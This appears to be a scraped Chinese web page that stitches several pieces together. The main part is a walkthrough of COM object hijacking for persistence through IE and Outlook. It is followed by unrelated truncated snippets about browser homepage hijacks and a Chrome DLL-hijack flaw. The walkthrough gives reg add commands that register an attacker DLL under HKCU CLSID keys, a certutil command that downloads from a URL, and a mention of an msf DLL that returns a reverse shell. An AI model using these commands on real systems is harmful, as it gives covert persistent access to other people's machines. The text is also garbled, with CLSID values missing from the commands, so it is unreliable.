3.參考文章
通過劫持ie瀏覽器或者outlook啟動過程中啟動的com元件,來使系統執行我們所指定的dll檔案,進而達到許可權維持,可以通過修改登錄檔來完成,不需要管理員許可權。
建立資料夾
如果是64位系統:
certutil.exe -urlcache -split -f [url] #刪除快取
劫持結果
也可以使用msf生成的dll來實現,會彈回shell,不過機器重啟後,會丟失桌面,直接黑屏。需要自己編寫惡意dll確保dll只會執行一次。定義乙個互斥向量即可。
所有命令如下:
cd desktop
set key=hkey_current_user\software\classes\clsid\\inprocserver32
reg.exe add %key% /v threadingmodel /t reg_sz /d apartment /f
set key=hkcu\software\classes\wow6432node\clsid\\inprocserver32
reg.exe add %key% /v threadingmodel /t reg_sz /d apartment /f
也可以使用指令碼一鍵完成:實現所需所有命令如下:
reg add hkcu\software\classes\clsid\\treatas /t reg_sz /d "" /f
reg add hkcu\software\classes\clsid\ /t reg_sz /d "mail plugin" /f
reg add hkcu\software\classes\clsid\\inprocserver32 /t reg_sz /d "c:\users\test\desktop\calc.dll" /f
reg add hkcu\software\classes\clsid\\inprocserver32 /v threadingmodel /t reg_sz /d "apartment" /f
reg add hkcu\software\classes\wow6432node\clsid\\treatas /t reg_sz /d "" /f
reg add hkcu\software\classes\wow6432node\clsid\ /t reg_sz /d "mail plugin" /f
reg add hkcu\software\classes\wow6432node\clsid\\inprocserver32 /t reg_sz /d "c:\users\test\desktop\calc.dll" /f
reg add hkcu\software\classes\wow6432node\clsid\\inprocserver32 /v threadingmodel /t reg_sz /d "apartment" /f
自動實現指令碼:hijack caccpropservicesclass and mmdeviceenumerator劫持ie瀏覽器
use com object hijacking to maintain persistence——hijack outlook
瀏覽器劫持
本人上網時喜歡從hao123進入。某一天,發現只要登入hao123就會轉向www.ykmzj.com 然後在轉向 123.sogou.com 最討厭這種 式的推廣。我不知道什麼原因引起的,但是我下決心一定要解決這個問題。先把搜狗輸入法解除安裝,雖然我知道,和搜狗輸入法沒有關係,但是我討厭搜狗這種推廣...
Chrome瀏覽器DLL劫持
chrome瀏覽器在載入dll檔案時考慮不周導致可能的dll劫持,對使用者造成潛在的安全隱患。chrome瀏覽器 版本號27.0.1453.116 windows xp sp3環境 執行chrome.exe會試圖載入同目錄下的chrome.dll檔案,但該dll檔案不存在,而是在子目錄27.0.14...
Chrome瀏覽器主頁劫持
之前電腦給小孩子上網課,等到拿回來的時候發現電腦多了一堆軟體,chorme瀏覽器主頁都被修改了,本以為簡單就能解決的事情,做起來才發現挺麻煩的。感慨現在這些人為了劫持瀏覽器主頁也是下了狠功夫。先來看一下問題 瀏覽器的啟動頁面已經被劫持,但是在chrome設定中沒有無法修改,在chrome設定中可以修...